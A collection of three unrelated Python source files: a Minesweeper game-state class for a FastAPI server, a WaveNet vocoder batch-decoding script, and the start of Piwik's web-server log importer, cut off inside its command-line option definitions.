def _iter_game(game: Minesweeper):
from dataclasses import asdict
separator = ','.encode('utf-8')
yield '{"items":['.encode('utf-8')
for idx, square in enumerate(game):
if idx != 0:
yield separator
yield Square.construct(Square.__fields_set__, **asdict(square)).json(exclude_none=True).encode('utf-8')
yield f'],"status":"{game.status}"'.encode('utf-8')
yield '}'.encode('utf-8')
class State:
_log: logging.Logger = logging.getLogger('uvicorn.error')
_lock: RLock
_game: Optional[Minesweeper]
_start: float = 0
_stop_init: float = 0
_stop_game: float = 0
@property
def log(self):
return State._log
def __init__(self):
self._lock = RLock()
self._game = None
def __call__(self): # pragma: nocover
"""For FastAPI compatibility
"""
return self
def _started(self):
if self._game is None:
raise HTTPException(status_code=status.HTTP_404_NOT_FOUND, detail='Game Not Started')
def _initialized(self):
self._started()
if self._game.status is Status.INITIALIZING:
raise HTTPException(status_code=status.HTTP_202_ACCEPTED, detail='Initializing')
def _done(self):
self._initialized()
if self._game.status is not Status.ONGOING:
raise HTTPException(status_code=status.HTTP_410_GONE, detail='Game Ended')
def status(self):
"""
Check status
"""
self._done()
@property
def game(self):
"""
Check common conditions ang get game
"""
self._done()
return self._game
def _initialize(self):
"""
Wait for field init
"""
self._game.initialize()
with self._lock:
self.__tread = None
self._stop_init = time.time()
self.log.info(
f'Game Initialization Finished, took: {round((self._stop_init - self._start) * 1000, 2):.2f} ms'
)
def _start_init_task(self):
import threading
self.__tread = threading.Thread(target=self._initialize, daemon=True)
self.__tread.start()
def initialize(self, start: Start):
"""
Initialize a game
"""
if self._game is None:
with self._lock:
if self._game is None:
self._start = time.time()
self._game = Minesweeper(start.width, start.height, start.mines) # Validated so won't throw
Move.adapt(self._game)
self._start_init_task()
self.log.info('Initialized a game')
return # Return here
raise HTTPException(status_code=status.HTTP_410_GONE, detail='Already Started')
def all(self):
"""
Iterate all open and flagged squares
"""
self._initialized()
return _iter_game(self._game)
def flag(self, x: int, y: int, set_flag: bool) -> int:
"""
Set or unset flag
"""
with self._lock:
s = self.game.check(x, y)
if (set_flag and not s.flag) or (not set_flag and s.flag):
m = self._game.flag(x, y)
if len(m.items) != 0:
return 201 if set_flag else 204
return 304
def check(self, x: int, y: int):
"""
Check a square
"""
self._initialized()
return self._game.check(x, y)
def open(self, x: int, y: int):
"""
Make a move
"""
with self._lock:
m = self.game.open(x, y)
if m.status is not None and m.status is not Status.ONGOING:
self._stop_game = time.time()
self.log.info(
f'Game Finished, took: {round(self._stop_game - self._start, 2):.2f} s'
)
elif len(m.items) == 0:
return None
return m
__all__ = ['State']
|
decode.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright 2017 Tomoki Hayashi (Nagoya University)
# Apache 2.0 (http://www.apache.org/licenses/LICENSE-2.0)
import argparse
import logging
import math
import os
import sys
import numpy as np
import soundfile as sf
import torch
import torch.multiprocessing as mp
from sklearn.preprocessing import StandardScaler
from torchvision import transforms
from wavenet_vocoder.nets.wavenet_utils import decode_mu_law
from wavenet_vocoder.nets.wavenet_utils import encode_mu_law
from wavenet_vocoder.nets import WaveNet
from wavenet_vocoder.utils import extend_time
from wavenet_vocoder.utils import find_files
from wavenet_vocoder.utils import read_hdf5
from wavenet_vocoder.utils import read_txt
from wavenet_vocoder.utils import shape_hdf5
def pad_list(batch_list, pad_value=0.0):
"""PAD VALUE.
Args:
batch_list (list): List of batch, where the shape of i-th batch (T_i, C).
pad_value (float): Value to pad.
Returns:
ndarray: Padded batch with the shape (B, T_max, C).
"""
batch_size = len(batch_list)
maxlen = max([batch.shape[0] for batch in batch_list])
n_feats = batch_list[0].shape[-1]
batch_pad = np.zeros((batch_size, maxlen, n_feats))
for idx, batch in enumerate(batch_list):
batch_pad[idx, :batch.shape[0]] = batch
return batch_pad
def decode_generator(feat_list,
batch_size=32,
feature_type="world",
wav_transform=None,
feat_transform=None,
upsampling_factor=80,
use_upsampling_layer=True,
use_speaker_code=False,
pulse=True):
"""GENERATE DECODING BATCH.
Args:
feat_list (list): List of feature files.
batch_size (int): Batch size in decoding.
feature_type (str): Feature type.
wav_transform (func): Preprocessing function for waveform.
feat_transform (func): Preprocessing function for aux feats.
upsampling_factor (int): Upsampling factor.
use_upsampling_layer (bool): Whether to use upsampling layer.
use_speaker_code (bool): Whether to use speaker code>
Returns:
generator: Generator instance.
"""
# ---------------------------
# sample-by-sample generation
# ---------------------------
if batch_size == 1:
for featfile in feat_list:
x = np.zeros((1))
h = read_hdf5(featfile, "/" + feature_type)
if not use_upsampling_layer:
h = extend_time(h, upsampling_factor)
if use_speaker_code:
sc = read_hdf5(featfile, "/speaker_code")
sc = np.tile(sc, [h.shape[0], 1])
h = np.concatenate([h, sc], axis=1)
# perform pre-processing
if wav_transform is not None:
x = wav_transform(x)
if feat_transform is not None:
h = feat_transform(h)
# convert to torch variable
x = torch.from_numpy(x).long()
h = torch.from_numpy(h).float()
x = x.unsqueeze(0) # 1 => 1 x 1
h = h.transpose(0, 1).unsqueeze(0) # T x C => 1 x C x T
# send to cuda
if torch.cuda.is_available():
x = x.cuda()
h = h.cuda()
# get target length and file id
if not use_upsampling_layer:
n_samples = h.size(2) - 1
else:
n_samples = h.size(2) * upsampling_factor - 1
feat_id = os.path.basename(featfile).replace(".h5", "")
yield feat_id, (x, h, n_samples)
# ----------------
# batch generation
# ----------------
else:
# sort with the feature length
shape_list = [shape_hdf5(f, "/" + feature_type)[0] for f in feat_list]
idx = np.argsort(shape_list)
feat_list = [feat_list[i] for i in idx]
# divide into batch list
n_batch = math.ceil(len(feat_list) / batch_size)
batch_lists = np.array_split(feat_list, n_batch)
batch_lists = [f.tolist() for f in batch_lists]
for batch_list in batch_lists:
batch_x = []
batch_h = []
n_samples_list = []
feat_ids = []
for featfile in batch_list:
# make seed waveform and load aux feature
x = np.zeros((1))
h = read_hdf5(featfile, "/" + feature_type)
if not use_upsampling_layer:
h = extend_time(h, upsampling_factor)
if use_speaker_code:
sc = read_hdf5(featfile, "/speaker_code")
sc = np.tile(sc, [h.shape[0], 1])
h = np.concatenate([h, sc], axis=1)
# perform pre-processing
if wav_transform is not None:
x = wav_transform(x)
if feat_transform is not None:
h = feat_transform(h)
# append to list
batch_x += [x]
batch_h += [h]
if not use_upsampling_layer:
n_samples_list += [h.shape[0] - 1]
else:
n_samples_list += [h.shape[0] * upsampling_factor - 1]
feat_ids += [os.path.basename(featfile).replace(".h5", "")]
# convert list to ndarray
batch_x = np.stack(batch_x, axis=0)
batch_h = pad_list(batch_h)
# convert to torch variable
batch_x = torch.from_numpy(batch_x).long()
batch_h = torch.from_numpy(batch_h).float().transpose(1, 2)
# send to cuda
if torch.cuda.is_available():
batch_x = batch_x.cuda()
batch_h = batch_h.cuda()
yield feat_ids, (batch_x, batch_h, n_samples_list)
def main():
"""RUN DECODING."""
parser = argparse.ArgumentParser()
# decode setting
parser.add_argument("--feats", required=True,
type=str, help="list or directory of aux feat files")
parser.add_argument("--checkpoint", required=True,
type=str, help="model file")
parser.add_argument("--outdir", required=True,
type=str, help="directory to save generated samples")
parser.add_argument("--stats", default=None,
type=str, help="hdf5 file including statistics")
parser.add_argument("--config", default=None,
type=str, help="configure file")
parser.add_argument("--fs", default=16000,
type=int, help="sampling rate")
parser.add_argument("--batch_size", default=32,
type=int, help="number of batch size in decoding")
parser.add_argument("--n_gpus", default=1,
type=int, help="number of gpus")
# other setting
parser.add_argument("--intervals", default=1000,
type=int, help="log interval")
parser.add_argument("--seed", default=1,
type=int, help="seed number")
parser.add_argument("--verbose", default=1,
type=int, help="log level")
args = parser.parse_args()
# set log level
if args.verbose > 0:
logging.basicConfig(level=logging.INFO,
format='%(asctime)s (%(module)s:%(lineno)d) %(levelname)s: %(message)s',
datefmt='%m/%d/%Y %I:%M:%S')
elif args.verbose > 1:
logging.basicConfig(level=logging.DEBUG,
format='%(asctime)s (%(module)s:%(lineno)d) %(levelname)s: %(message)s',
datefmt='%m/%d/%Y %I:%M:%S')
else:
logging.basicConfig(level=logging.WARNING,
format='%(asctime)s (%(module)s:%(lineno)d) %(levelname)s: %(message)s',
datefmt='%m/%d/%Y %I:%M:%S')
logging.warning("logging is disabled.")
# show arguments
for key, value in vars(args).items():
logging.info("%s = %s" % (key, str(value)))
# check arguments
if args.stats is None:
args.stats = os.path.dirname(args.checkpoint) + "/stats.h5"
if args.config is None:
args.config = os.path.dirname(args.checkpoint) + "/model.conf"
if not os.path.exists(args.stats):
raise FileNotFoundError("statistics file is missing (%s)." % (args.stats))
if not os.path.exists(args.config):
raise FileNotFoundError("config file is missing (%s)." % (args.config))
# check directory existence
if not os.path.exists(args.outdir):
os.makedirs(args.outdir)
# fix seed
os.environ['PYTHONHASHSEED'] = str(args.seed)
np.random.seed(args.seed)
torch.manual_seed(args.seed)
# fix slow computation of dilated conv
# https://github.com/pytorch/pytorch/issues/15054#issuecomment-450191923
torch.backends.cudnn.benchmark = True
# load config
config = torch.load(args.config)
# get file list
if os.path.isdir(args.feats):
feat_list = sorted(find_files(args.feats, "*.h5"))
elif os.path.isfile(args.feats):
feat_list = read_txt(args.feats)
else:
logging.error("--feats should be directory or list.")
sys.exit(1)
# prepare the file list for parallel decoding
feat_lists = np.array_split(feat_list, args.n_gpus)
feat_lists = [f_list.tolist() for f_list in feat_lists]
# define transform
scaler = StandardScaler()
scaler.mean_ = read_hdf5(args.stats, "/" + config.feature_type + "/mean")
scaler.scale_ = read_hdf5(args.stats, "/" + config.feature_type + "/scale")
wav_transform = transforms.Compose([
lambda x: encode_mu_law(x, config.n_quantize)])
feat_transform = transforms.Compose([
lambda x: scaler.transform(x)])
# define gpu decode function
def gpu_decode(feat_list, gpu):
# set default gpu and do not track gradient
torch.cuda.set_device(gpu)
torch.set_grad_enabled(False)
# define model and load parameters
if config.use_upsampling_layer:
upsampling_factor = config.upsampling_factor
else:
upsampling_factor = 0
model = WaveNet(
n_quantize=config.n_quantize,
n_aux=config.n_aux,
n_resch=config.n_resch,
n_skipch=config.n_skipch,
dilation_depth=config.dilation_depth,
dilation_repeat=config.dilation_repeat,
kernel_size=config.kernel_size,
upsampling_factor=upsampling_factor)
model.load_state_dict(torch.load(
args.checkpoint,
map_location=lambda storage,
loc: storage)["model"])
model.eval()
model.cuda()
# define generator
generator = decode_generator(
feat_list,
batch_size=args.batch_size,
feature_type=config.feature_type,
wav_transform=wav_transform,
feat_transform=feat_transform,
upsampling_factor=config.upsampling_factor,
use_upsampling_layer=config.use_upsampling_layer,
use_speaker_code=config.use_speaker_code)
# decode
if args.batch_size > 1:
for feat_ids, (batch_x, batch_h, n_samples_list) in generator:
logging.info("decoding start")
samples_list = model.batch_fast_generate(
batch_x, batch_h, n_samples_list, args.intervals)
for feat_id, samples in zip(feat_ids, samples_list):
wav = decode_mu_law(samples, config.n_quantize)
sf.write(args.outdir + "/" + feat_id + ".wav", wav, args.fs, "PCM_16")
logging.info("wrote %s.wav in %s." % (feat_id, args.outdir))
else:
for feat_id, (x, h, n_samples) in generator:
logging.info("decoding %s (length = %d)" % (feat_id, n_samples))
samples = model.fast_generate(x, h, n_samples, args.intervals)
wav = decode_mu_law(samples, config.n_quantize)
sf.write(args.outdir + "/" + feat_id + ".wav", wav, args.fs, "PCM_16")
logging.info("wrote %s.wav in %s." % (feat_id, args.outdir))
# parallel decode
processes = []
for gpu, feat_list in enumerate(feat_lists):
p = mp.Process(target=gpu_decode, args=(feat_list, gpu,))
p.start()
processes.append(p)
# wait for all process
for p in processes:
p.join()
if __name__ == "__main__":
main()
|
import_logs.py
|
#!/usr/bin/python
# vim: et sw=4 ts=4:
# -*- coding: utf-8 -*-
#
# Piwik - free/libre analytics platform
#
# @link http://piwik.org
# @license http://www.gnu.org/licenses/gpl-3.0.html GPL v3 or later
# @version $Id$
#
# For more info see: http://piwik.org/log-analytics/ and http://piwik.org/docs/log-analytics-tool-how-to/
#
# Requires Python 2.6 or greater.
#
import base64
import bz2
import ConfigParser
import datetime
import fnmatch
import gzip
import hashlib
import httplib
import inspect
import itertools
import logging
import optparse
import os
import os.path
import Queue
import re
import sys
import threading
import time
import urllib
import urllib2
import urlparse
import subprocess
import functools
import traceback
import socket
try:
import json
except ImportError:
try:
import simplejson as json
except ImportError:
if sys.version_info < (2, 6):
print >> sys.stderr, 'simplejson (http://pypi.python.org/pypi/simplejson/) is required.'
sys.exit(1)
##
## Constants.
##
STATIC_EXTENSIONS = set((
'gif jpg jpeg png bmp ico svg svgz ttf otf eot woff class swf css js xml robots.txt'
).split())
DOWNLOAD_EXTENSIONS = set((
'7z aac arc arj asf asx avi bin csv deb dmg doc docx exe flv gz gzip hqx '
'ibooks jar mpg mp2 mp3 mp4 mpeg mov movie msi msp odb odf odg odp '
'ods odt ogg ogv pdf phps ppt pptx qt qtm ra ram rar rpm sea sit tar tbz '
'bz2 tbz tgz torrent txt wav wma wmv wpd xls xlsx xml xsd z zip '
'azw3 epub mobi apk'
).split())
# A good source is: http://phpbb-bots.blogspot.com/
EXCLUDED_USER_AGENTS = (
'adsbot-google',
'ask jeeves',
'baidubot',
'bot-',
'bot/',
'ccooter/',
'crawl',
'curl',
'echoping',
'exabot',
'feed',
'googlebot',
'ia_archiver',
'java/',
'libwww',
'mediapartners-google',
'msnbot',
'netcraftsurvey',
'panopta',
'robot',
'spider',
'surveybot',
'twiceler',
'voilabot',
'yahoo',
'yandex',
)
PIWIK_DEFAULT_MAX_ATTEMPTS = 3
PIWIK_DEFAULT_DELAY_AFTER_FAILURE = 10
DEFAULT_SOCKET_TIMEOUT = 300
PIWIK_EXPECTED_IMAGE = base64.b64decode(
'R0lGODlhAQABAIAAAAAAAAAAACH5BAEAAAAALAAAAAABAAEAAAICRAEAOw=='
)
##
## Formats.
##
class BaseFormatException(Exception): pass
class BaseFormat(object):
def __init__(self, name):
self.name = name
self.regex = None
self.date_format = '%d/%b/%Y:%H:%M:%S'
def check_format(self, file):
line = file.readline()
file.seek(0)
return self.check_format_line(line)
def check_format_line(self, line):
return False
class JsonFormat(BaseFormat):
def __init__(self, name):
super(JsonFormat, self).__init__(name)
self.json = None
self.date_format = '%Y-%m-%dT%H:%M:%S'
def check_format_line(self, line):
try:
self.json = json.loads(line)
return True
except:
return False
def match(self, line):
try:
self.json = json.loads(line)
return self
except:
self.json = None
return None
def get(self, key):
# Some ugly patchs ...
if key == 'generation_time_milli':
self.json[key] = int(self.json[key] * 1000)
# Patch date format ISO 8601
elif key == 'date':
tz = self.json[key][19:]
self.json['timezone'] = tz.replace(':', '')
self.json[key] = self.json[key][:19]
try:
return self.json[key]
except KeyError:
raise BaseFormatException()
def get_all(self,):
return self.json
def remove_ignored_groups(self, groups):
for group in groups:
del self.json[group]
class RegexFormat(BaseFormat):
def __init__(self, name, regex, date_format=None):
super(RegexFormat, self).__init__(name)
if regex is not None:
self.regex = re.compile(regex)
if date_format is not None:
self.date_format = date_format
self.matched = None
def check_format_line(self, line):
return self.match(line)
def match(self,line):
if not self.regex:
return None
match_result = self.regex.match(line)
if match_result:
self.matched = match_result.groupdict()
else:
self.matched = None
return match_result
def get(self, key):
try:
return self.matched[key]
except KeyError:
raise BaseFormatException("Cannot find group '%s'." % key)
def get_all(self,):
return self.matched
def remove_ignored_groups(self, groups):
for group in groups:
del self.matched[group]
class W3cExtendedFormat(RegexFormat):
FIELDS_LINE_PREFIX = '#Fields: '
fields = {
'date': '(?P<date>^\d+[-\d+]+',
'time': '[\d+:]+)[.\d]*?', # TODO should not assume date & time will be together not sure how to fix ATM.
'cs-uri-stem': '(?P<path>/\S*)',
'cs-uri-query': '(?P<query_string>\S*)',
'c-ip': '"?(?P<ip>[\d*.-]*)"?',
'cs(User-Agent)': '(?P<user_agent>".*?"|\S+)',
'cs(Referer)': '(?P<referrer>\S+)',
'sc-status': '(?P<status>\d+)',
'sc-bytes': '(?P<length>\S+)',
'cs-host': '(?P<host>\S+)',
'cs-username': '(?P<userid>\S+)',
'time-taken': '(?P<generation_time_secs>[.\d]+)'
}
def __init__(self):
super(W3cExtendedFormat, self).__init__('w3c_extended', None, '%Y-%m-%d %H:%M:%S')
def check_format(self, file):
self.create_regex(file)
# if we couldn't create a regex, this file does not follow the W3C extended log file format
if not self.regex:
file.seek(0)
return
first_line = file.readline()
file.seek(0)
return self.check_format_line(first_line)
def create_regex(self, file):
fields_line = None
if config.options.w3c_fields:
fields_line = config.options.w3c_fields
# collect all header lines up until the Fields: line
# if we're reading from stdin, we can't seek, so don't read any more than the Fields line
header_lines = []
while fields_line is None:
line = file.readline().strip()
if not line:
continue
if not line.startswith('#'):
break
if line.startswith(W3cExtendedFormat.FIELDS_LINE_PREFIX):
fields_line = line
else:
header_lines.append(line)
if not fields_line:
return
# store the header lines for a later check for IIS
self.header_lines = header_lines
# Parse the 'Fields: ' line to create the regex to use
full_regex = []
expected_fields = type(self).fields.copy() # turn custom field mapping into field => regex mapping
# if the --w3c-time-taken-millisecs option is used, make sure the time-taken field is interpreted as milliseconds
if config.options.w3c_time_taken_in_millisecs:
expected_fields['time-taken'] = '(?P<generation_time_milli>[\d.]+)'
for mapped_field_name, field_name in config.options.custom_w3c_fields.iteritems():
expected_fields[mapped_field_name] = expected_fields[field_name]
del expected_fields[field_name]
# add custom field regexes supplied through --w3c-field-regex option
for field_name, field_regex in config.options.w3c_field_regexes.iteritems():
expected_fields[field_name] = field_regex
# Skip the 'Fields: ' prefix.
fields_line = fields_line[9:].strip()
for field in re.split('\s+', fields_line):
try:
regex = expected_fields[field]
except KeyError:
regex = '(?:".*?"|\S+)'
full_regex.append(regex)
full_regex = '\s+'.join(full_regex)
logging.debug("Based on 'Fields:' line, computed regex to be %s", full_regex)
self.regex = re.compile(full_regex)
def check_for_iis_option(self):
if not config.options.w3c_time_taken_in_millisecs and self._is_time_taken_milli() and self._is_iis():
logging.info("WARNING: IIS log file being parsed without --w3c-time-taken-milli option. IIS"
" stores millisecond values in the time-taken field. If your logfile does this, the aforementioned"
" option must be used in order to get accurate generation times.")
def _is_iis(self):
return len([line for line in self.header_lines if 'internet information services' in line.lower() or 'iis' in line.lower()]) > 0
def _is_time_taken_milli(self):
return 'generation_time_milli' not in self.regex.pattern
class IisFormat(W3cExtendedFormat):
fields = W3cExtendedFormat.fields.copy()
fields.update({
'time-taken': '(?P<generation_time_milli>[.\d]+)',
'sc-win32-status': '(?P<__win32_status>\S+)' # this group is useless for log importing, but capturing it
# will ensure we always select IIS for the format instead of
# W3C logs when detecting the format. This way there will be
# less accidental importing of IIS logs w/o --w3c-time-taken-milli.
})
def __init__(self):
super(IisFormat, self).__init__()
self.name = 'iis'
class AmazonCloudFrontFormat(W3cExtendedFormat):
fields = W3cExtendedFormat.fields.copy()
fields.update({
'x-event': '(?P<event_action>\S+)',
'x-sname': '(?P<event_name>\S+)',
'cs-uri-stem': '(?:rtmp:/)?(?P<path>/\S*)',
'c-user-agent': '(?P<user_agent>".*?"|\S+)',
# following are present to match cloudfront instead of W3C when we know it's cloudfront
'x-edge-location': '(?P<x_edge_location>".*?"|\S+)',
'x-edge-result-type': '(?P<x_edge_result_type>".*?"|\S+)',
'x-edge-request-id': '(?P<x_edge_request_id>".*?"|\S+)',
'x-host-header': '(?P<x_host_header>".*?"|\S+)'
})
def __init__(self):
super(AmazonCloudFrontFormat, self).__init__()
self.name = 'amazon_cloudfront'
def get(self, key):
if key == 'event_category' and 'event_category' not in self.matched:
return 'cloudfront_rtmp'
elif key == 'status' and 'status' not in self.matched:
return '200'
elif key == 'user_agent':
user_agent = super(AmazonCloudFrontFormat, self).get(key)
return urllib2.unquote(user_agent)
else:
return super(AmazonCloudFrontFormat, self).get(key)
_HOST_PREFIX = '(?P<host>[\w\-\.]*)(?::\d+)?\s+'
_COMMON_LOG_FORMAT = (
'(?P<ip>\S+)\s+\S+\s+\S+\s+\[(?P<date>.*?)\s+(?P<timezone>.*?)\]\s+'
'"\S+\s+(?P<path>.*?)\s+\S+"\s+(?P<status>\S+)\s+(?P<length>\S+)'
)
_NCSA_EXTENDED_LOG_FORMAT = (_COMMON_LOG_FORMAT +
'\s+"(?P<referrer>.*?)"\s+"(?P<user_agent>.*?)"'
)
_S3_LOG_FORMAT = (
'\S+\s+(?P<host>\S+)\s+\[(?P<date>.*?)\s+(?P<timezone>.*?)\]\s+(?P<ip>\S+)\s+'
'\S+\s+\S+\s+\S+\s+\S+\s+"\S+\s+(?P<path>.*?)\s+\S+"\s+(?P<status>\S+)\s+\S+\s+(?P<length>\S+)\s+'
'\S+\s+\S+\s+\S+\s+"(?P<referrer>.*?)"\s+"(?P<user_agent>.*?)"'
)
_ICECAST2_LOG_FORMAT = ( _NCSA_EXTENDED_LOG_FORMAT +
'\s+(?P<session_time>\S+)'
)
FORMATS = {
'common': RegexFormat('common', _COMMON_LOG_FORMAT),
'common_vhost': RegexFormat('common_vhost', _HOST_PREFIX + _COMMON_LOG_FORMAT),
'ncsa_extended': RegexFormat('ncsa_extended', _NCSA_EXTENDED_LOG_FORMAT),
'common_complete': RegexFormat('common_complete', _HOST_PREFIX + _NCSA_EXTENDED_LOG_FORMAT),
'w3c_extended': W3cExtendedFormat(),
'amazon_cloudfront': AmazonCloudFrontFormat(),
'iis': IisFormat(),
's3': RegexFormat('s3', _S3_LOG_FORMAT),
'icecast2': RegexFormat('icecast2', _ICECAST2_LOG_FORMAT),
'nginx_json': JsonFormat('nginx_json'),
}
##
## Code.
##
class Configuration(object):
"""
Stores all the configuration options by reading sys.argv and parsing,
if needed, the config.inc.php.
It has 2 attributes: options and filenames.
"""
class Error(Exception):
pass
def _create_parser(self):
"""
Initialize and return the OptionParser instance.
"""
option_parser = optparse.OptionParser(
usage='Usage: %prog [options] log_file [ log_file [...] ]',
description="Import HTTP access logs to Piwik. "
"log_file is the path to a server access log file (uncompressed, .gz, .bz2, or specify - to read from stdin). "
" By default, the script will try to produce clean reports and will exclude bots, static files, discard http error and redirects, etc. This is customizable, see below.",
epilog="About Piwik Server Log Analytics: http://piwik.org/log-analytics/ "
" Found a bug? Please create a ticket in http://dev.piwik.org/ "
" Please send your suggestions or successful user story to hello@piwik.org "
)
option_parser.add_option(
'--debug', '-d', dest='debug', action='count', default=0,
help="Enable debug output (specify multiple times for more verbose)",
)
option_parser.add_option(
'--url', dest='piwik_url',
help="REQUIRED Your Piwik server URL, eg. http://example.com/piwik/ or http://analytics.example.net",
)
option_parser.add_option(
'--dry-run', dest='dry_run',
action='store_true', default=False,
help="Perform a trial run with no tracking data being inserted into Piwik",
)
option_parser.add_option(
'--show-progress', dest='show_progress',
action='store_true', default=os.isatty(sys.stdout.fileno()),
help="Print a progress report X seconds (default: 1, use --show-progress-delay to override)"
)
option_parser.add_option(
'--show-progress-delay', dest='show_progress_delay',
type='int', default=1,
help="Change the default progress delay"
)
option_parser.add_option(
'--add-sites-new-hosts', dest='add_sites_new_hosts',
action='store_true', default=False,
help="When a hostname is found in the log file, but not matched to any website "
"in Piwik, automatically create a new website in Piwik with this hostname to "
"import the logs"
)
option_parser.add_option(
'--idsite', dest='site_id',
help= ("When specified, "
"data in the specified log files will be tracked for this Piwik site ID."
" The script will not auto-detect the website based on the log line hostname (new websites will not be automatically created).")
)
option_parser.add_option(
'--idsite-fallback', dest='site_id_fallback',
help="Default Piwik site ID to use if the hostname doesn't match any "
"known Website's URL. New websites will not be automatically created. "
" Used only if --add-sites-new-hosts or --idsite are not set",
)
default_config = os.path.abspath(
os.path.join(os.path.dirname(__file__),
'../../config/config.ini.php'),
)
option_parser.add_option(
'--config', dest='config_file', default=default_config,
help=(
"This is only used when --login and --password is not used. "
"Piwik will read the configuration file (default: %default) to "
"fetch the Super User token_auth from the config file. "
)
)
option_parser.add_option(
'--login', dest='login',
help="You can manually specify the Piwik Super User login"
)
option_parser.add_option(
'--password', dest='password',
help="You can manually specify the Piwik Super User password"
)
option_parser.add_option(
'--token-auth', dest='piwik_token_auth',
help="Piwik Super User token_auth, 32 characters hexadecimal string, found in Piwik > API",
)
option_parser.add_option(
'--hostname', dest='hostnames', action='append', default=[],
help="Accepted hostname (requests with other hostnames will be excluded). "
"Can be specified multiple times"
)
option_parser.add_option(
'--exclude-path', dest='excluded_paths', action='append', default=[],
help="Any URL path matching this exclude-path will not be imported in Piwik. Can be specified multiple times"
)
option_parser.add_option(
'--exclude-path-from', dest='exclude_path_from',
help="Each line from this file is a path to exclude (see: --exclude-path)"
)
option_parser.add_option(
'--include-path', dest='included_paths', action='append', default=[],
help="Paths to include. Can be specified multiple times. If not specified, all paths are included."
)
option_parser.add_option(
'--include-path-from', dest='include_path_from',
help="Each line from this file is a path to include"
)
option_parser.add_option(
'--useragent-exclude', dest='excluded_useragents',
action='append', default=[],
help="User agents to exclude (in addition to the standard excluded "
"user agents). Can be specified multiple times",
)
option_parser.add_option(
'--enable-static', dest='enable_static',
action='store_true', default=False,
help="Track static files (images, css, js, ico, ttf, etc.)"
)
option_parser.add_option(
'--enable-bots', dest='enable_bots',
action='store_true', default=False,
help="Track bots. All bot visits will have a Custom Variable set with name='Bot' and value='$Bot_user_agent_here$'"
)
option_parser.add_option(
'--enable-http-errors', dest='enable_http_errors',
action='store_true', default=False,
help="Track HTTP errors (status code 4xx or 5xx)"
)
option_parser.add_option(
'--enable-http-redirects', dest='enable_http_redirects',
action='store_true', default=False,
help="Track HTTP redirects (status code 3xx except 304)"
)
option_parser.add_option(
'--enable-reverse-dns', dest='reverse_dns',
action='store_true', default=False,
help="Enable reverse DNS, used to generate the 'Providers' report in Piwik. "
"Disabled by default, as it impacts performance"
)
option_parser.add_option(
'--strip-query-string', dest='strip_query_string',
action='store_true', default=False,
help="Strip the query string from the URL"
)
option_parser.add_option(
'--query-string-delimiter', dest='query_string_delimiter', default='?',
help="The query string delimiter (default: %default)"
)
option_parser.add_option(
'--log-format-name', dest='log_format_name', default=None,
help=("Access log format to detect (supported are: %s). "
"When not specified, the log format will be autodetected by trying all supported log formats."
% ', '.join(sorted(FORMATS.iterkeys())))
)
available_regex_groups = ['date', 'path', 'query_string', 'ip', 'user_agent', 'referrer', 'status',
'length', 'host', 'userid', 'generation_time_milli', 'event_action',
'event_name', 'timezone', 'session_time']
option_parser.add_option(
'--log-format-regex', dest='log_format_regex', default=None,
help="Regular expression used to parse log entries. Regexes must contain named groups for different log fields. "
"Recognized fields include: %s. For an example of a supported Regex, see the source code of this file. "
"Overrides --log-format-name." % (', '.join(available_regex_groups))
)
option_parser.add_option(
'--log-hostname', dest='log_hostname', default=None,
help="Force this hostname for a log format that doesn't incldude it. All hits "
"will seem to came to this host"
)
option_parser.add_option(
'--skip', dest='skip', default=0, type='int',
help="Skip the n first lines to start parsing/importing data at a given line for the specified log file",
)
option_parser.add_option(
'--recorders', dest='recorders', default=1, type='int',
help="Number of simultaneous recorders (default: %default). "
"It should be set to the number of CPU cores in your server. "
"You can also experiment with higher values which may increase performance until a certain point",
)
option_parser.add_option(
'--recorder-max-payload-size', dest='recorder_max_payload_size', default=200, type='int',
help="Maximum number of log entries to record in one tracking request (default: %default). "
)
option_parser.add_option(
'--replay-tracking', dest='replay_tracking',
action='store_true', default=False,
help="Replay piwik.php requests found in custom logs (only piwik.php requests expected). \nSee http://piwik.org/faq/how-to/faq_17033/"
)
option_parser.add_option(
'--replay-tracking-expected-tracker-file', dest='replay_tracking_expected_tracker_file', default='piwik.php',
help="The expected suffix for tracking request paths. Only logs whose paths end with this will be imported. Defaults "
"to 'piwik.php' so only requests to the piwik.php file will be imported."
)
option_parser.add_option(
'--output', dest='output',
help="Redirect output (stdout and stderr) to the specified file"
)
option_parser.add_option(
'--encoding', dest='encoding', default='utf8',
help="Log files encoding (default: %default)"
)
option_parser.add_option(
'--disable-bulk-tracking', dest='use_bulk_tracking',
default=True, action='store_false',
help="Disables use of bulk tracking so recorders record one hit at a time."
)
option_parser.add_option(
'--debug-force-one-hit-every-Ns', dest='force_one_action_interval', default=False, type='float',
help="Debug option that will force each recorder to record one hit every N secs."
)
option_parser.add_option(
'--force-lowercase-path', dest='force_lowercase_path', default=False, action='store_true',
help="Make URL path lowercase so paths with the same letters but different cases are "
"treated the same."
)
option_parser.add_option(
'--enable-testmode', dest='enable_testmode', default=False, action='store_true',
help="If set, it will try to get the token_auth from the piwik_tests directory"
)
option_parser.add_option(
'--download-extensions', dest='download_extensions', default=None,
help="By default Piwik tracks as Downloads the most popular file extensions. If you set this parameter (format: pdf,doc,...) then files with an extension found in the list will be imported as Downloads, other file extensions downloads will be skipped."
)
option_parser.add_option(
'--w3c-map-field', action='callback', callback=functools.partial(self._set_option_map, 'custom_w3c_fields'), type='string',
help="Map a custom log entry field in your W3C log to a default one. Use this option to load custom log "
"files that use the W3C extended log format such as those from the Advanced Logging W3C module. Used "
"as, eg, --w3c-map-field my-date=date. Recognized default fields include: %s\n\n"
"Formats that extend the W3C extended log format (like the cloudfront RTMP log format) may define more "
"fields that can be mapped."
% (', '.join(W3cExtendedFormat.fields.keys()))
)
option_parser.add_option(
'--w3c-time-taken-millisecs', action='store_true', default=False, dest='w3c_time_taken_in_millisecs',
help="If set, interprets the time-taken W3C log field as a number of milliseconds. This must be set for importing"
" IIS logs."
)
option_parser.add_option(
'--w3c-fields', dest='w3c_fields', default=None,
help="Specify the '#Fields:' line for a log file in the W3C Extended log file format. Use this option if "
"your log file doesn't contain the '#Fields:' line which is required for parsing. This option must be used "
"in conjuction with --log-format-name=w3c_extended.\n"
"Example: --w3c-fields='#Fields: date time c-ip ...'"
)
option_parser.add_option(
'--w3c-field-regex', action='callback', callback=functools.partial(self._set_option_map, 'w3c_field_regexes'), type='string',
help="Specify a regex for a field in your W3C extended log file. You can use this option to parse fields the "
"importer does not natively recognize and then use one of the --regex-group-to-XXX-cvar options to track "
